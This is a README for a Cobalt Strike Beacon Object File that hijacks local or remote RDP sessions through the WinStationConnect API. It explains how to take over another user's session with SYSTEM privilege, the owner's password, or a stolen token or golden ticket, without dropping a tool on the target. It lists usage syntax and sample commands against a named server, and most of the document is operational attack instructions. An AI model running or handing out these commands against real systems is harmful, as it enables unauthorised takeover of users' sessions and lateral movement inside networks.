Cobalt Strike Beacon Object File (BOF) that uses the WinStationConnect API to perform local/remote RDP session hijacking. With a valid access token / Kerberos ticket (e.g., golden ticket) of the session owner, you can hijack the session remotely without dropping any beacon/tool on the target server.
To enumerate sessions locally/remotely, you can use Quser-BOF.
Usage
Usage: bof-rdphijack [your console session id] [target session id to hijack] [password|server] [argument]

Command  Description
-------- -----------
password Specifies the password of the user who owns the session to which you want to connect.
server   Specifies the remote server on which you want to perform RDP hijacking.

Sample usage
--------
Redirect session 2 to session 1 (requires SYSTEM privilege):
bof-rdphijack 1 2
Redirect session 2 to session 1 with the password of the user who owns session 2 (requires a high integrity beacon):
bof-rdphijack 1 2 password [email protected]
Redirect session 2 to session 1 on a remote server (requires a token/ticket of the user who owns session 2):
bof-rdphijack 1 2 server SQL01.lab.inside
Compile
make
Reference
tscon.exe